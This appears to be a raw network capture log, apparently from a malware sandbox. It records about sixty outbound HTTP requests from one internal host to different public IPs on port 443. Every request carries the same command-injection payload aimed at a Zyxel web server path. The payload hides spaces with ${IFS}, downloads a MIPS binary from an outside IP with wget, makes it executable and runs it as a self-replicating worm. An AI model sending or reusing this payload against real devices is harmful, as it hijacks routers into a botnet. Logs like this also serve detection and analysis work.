                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7280192.168.2.1434376187.50.79.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.627316952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7281192.168.2.145862286.240.184.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.627357006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7282192.168.2.1460992162.124.8.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.627394915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7283192.168.2.1442584180.94.12.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.627434015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7284192.168.2.144946878.91.70.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.627476931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7285192.168.2.1448626211.72.218.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.627501011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7286192.168.2.1439432152.240.45.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.627531052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7287192.168.2.1447166126.104.147.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.627576113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7288192.168.2.1452290207.206.109.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.627619982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7289192.168.2.1437676145.49.60.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.627655983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7290192.168.2.14542429.212.161.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.627685070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7291192.168.2.145327654.159.73.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.627736092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7292192.168.2.144212290.214.250.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.627762079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7293192.168.2.1457720112.132.249.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.627803087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7294192.168.2.1451282123.86.108.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.627831936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7295192.168.2.144219660.27.226.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.627866030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7296192.168.2.1433750152.57.122.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.627896070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7297192.168.2.145442413.190.126.131443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.627968073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7298192.168.2.143965072.210.175.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.627991915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7299192.168.2.1454470129.160.179.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.628029108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7300192.168.2.1446422118.4.23.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.628062963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7301192.168.2.144523444.198.7.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.628089905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7302192.168.2.1449530162.150.252.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.628132105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7303192.168.2.1448978171.29.20.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.628154993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7304192.168.2.144642099.20.59.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.628210068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7305192.168.2.1453908139.23.174.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.628237009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7306192.168.2.144750263.163.154.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.628267050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7307192.168.2.1436458135.142.64.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.628304005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7308192.168.2.1437062182.126.39.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.628357887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7309192.168.2.1444072192.119.65.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.628377914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7310192.168.2.1439376217.62.60.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.628423929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7311192.168.2.1443078112.186.242.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.628449917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7312192.168.2.144230280.92.198.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.628499985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7313192.168.2.143884041.85.1.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.628526926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7314192.168.2.1459246126.112.167.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.628551006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7315192.168.2.1434448128.207.99.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.628587961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7316192.168.2.145150293.161.91.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.628609896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7317192.168.2.1434510112.133.92.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.628659964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7318192.168.2.1447440183.87.162.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.628679991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7319192.168.2.143527246.86.183.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.628701925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7320192.168.2.145537427.12.206.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.628743887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7321192.168.2.144683053.95.140.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.628820896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7322192.168.2.1448156110.0.116.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.628850937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7323192.168.2.1433774140.70.175.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.628879070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7324192.168.2.145268034.85.251.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.628942966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7325192.168.2.144108043.199.243.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.628967047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7326192.168.2.1442444209.248.28.52443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.628999949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7327192.168.2.144455220.171.188.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.629036903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7328192.168.2.1440152190.40.174.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.629061937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7329192.168.2.143668031.174.45.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.629112005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7330192.168.2.1440100176.183.63.91443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.629159927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7331192.168.2.1459248121.209.89.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.629206896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7332192.168.2.1447750217.35.210.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.629236937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7333192.168.2.1460488166.248.252.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.629271984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7334192.168.2.1450932164.94.208.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.629306078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7335192.168.2.1453076197.100.241.50443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.629348040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7336192.168.2.144251232.91.63.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.629416943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7337192.168.2.143703618.185.104.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.629441977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7338192.168.2.1443824168.104.207.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.629606962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7339192.168.2.1448656123.101.164.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.629628897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7340192.168.2.1456564126.94.94.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:04.629652977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7341192.168.2.1444466147.12.2.33443
                                                        TimestampBytes transferredDirectionData
